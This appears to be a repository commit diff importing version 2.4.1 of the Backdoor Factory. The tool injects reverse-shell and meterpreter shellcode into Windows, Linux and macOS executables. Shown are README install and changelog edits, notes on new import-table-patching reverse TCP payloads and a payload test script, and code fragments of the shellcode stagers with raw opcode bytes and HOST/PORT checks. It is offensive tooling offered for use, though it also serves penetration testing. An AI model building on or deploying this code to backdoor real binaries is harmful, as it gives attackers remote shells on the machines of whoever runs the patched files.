Commit e0307aee authored by Mati's avatar Mati

Imported Upstream version 2.4.1

parent b4ee9e50
......@@ -21,21 +21,32 @@ See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki
Dependences:
Capstone, using the 'next' repo until it is the 'master' repo:
https://github.com/aquynh/capstone/tree/next
Capstone, using the master repo at this commit:
https://github.com/aquynh/capstone/releases/tag/3.0.1
git checkout e9be7ec26c2b13ba248d8b093a9f0d333f866d2c
Pefile, most recent:
https://code.google.com/p/pefile/
INSTALL:
./install.sh
Kali Install:
apt-get update
apt-get install backdoor-factory
Other *NIX/MAC INSTALL:
./install.sh
This will install Capstone with the 'next' repo and use pip to install pefile.
This will install Capstone with 3.01 pip to install pefile.
UPDATE:
./update.sh
./update.sh
---
......@@ -71,6 +82,7 @@ From DerbyCon:
Recently tested on many binaries.
---
./backdoor.py -h
Usage: backdoor.py [options]
Options:
......@@ -164,6 +176,7 @@ Recently tested on many binaries.
-Append (a), for creating a code cave
-Ignore (i), nevermind, ignore this binary
Can ignore DLLs.
Import Table Patching
###ELF Files
......@@ -268,18 +281,18 @@ Sample Usage:
###Changelog
####12/27/2014
####2/14/2014
I <3 you guys
Added payloadtests.py
* Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that
use the import table for winAPI calls. If the binary you are patching does not
have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a
new Import Table in a new section. Supports x64/x86 PEs.
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
* Added iat_reverse_tcp for x64 PEs.
```
Usage: payloadtest.py binary HOST PORT
* Bug fixes and improvements
```
####1/1/2015
Happy New Year!
......@@ -294,6 +307,18 @@ breaks BDF.
Fixes to support cython capstone implementation null byte truncation issue
####12/27/2014
Added payloadtests.py
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
Usage: payloadtest.py binary HOST PORT
####12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
......
......@@ -12,7 +12,7 @@ techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.8
2.4.1
"""
author = """\
......@@ -196,7 +196,7 @@ class bdfMain():
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechinism. Edit "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
......@@ -538,7 +538,7 @@ class bdfMain():
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(supported_file.FILE)
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
git checkout e9be7ec26c2b13ba248d8b093a9f0d333f866d2c
./make.sh
......
......@@ -198,6 +198,7 @@ class macho_intel64_shellcode():
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
......
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......@@ -35,7 +35,6 @@ POSSIBILITY OF SUCH DAMAGE.
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
......@@ -53,12 +52,10 @@ class winI32_shellcode():
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
self.apis_needed = None
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
return False
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
......@@ -73,8 +70,13 @@ class winI32_shellcode():
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
......@@ -335,8 +337,13 @@ class winI32_shellcode():
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
......@@ -466,9 +473,15 @@ class winI32_shellcode():
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
......@@ -531,16 +544,18 @@ class winI32_shellcode():
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
return False
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
......
This diff is collapsed.
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
......
This diff is collapsed.
This source diff could not be displayed because it is too large. You can view the blob instead.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment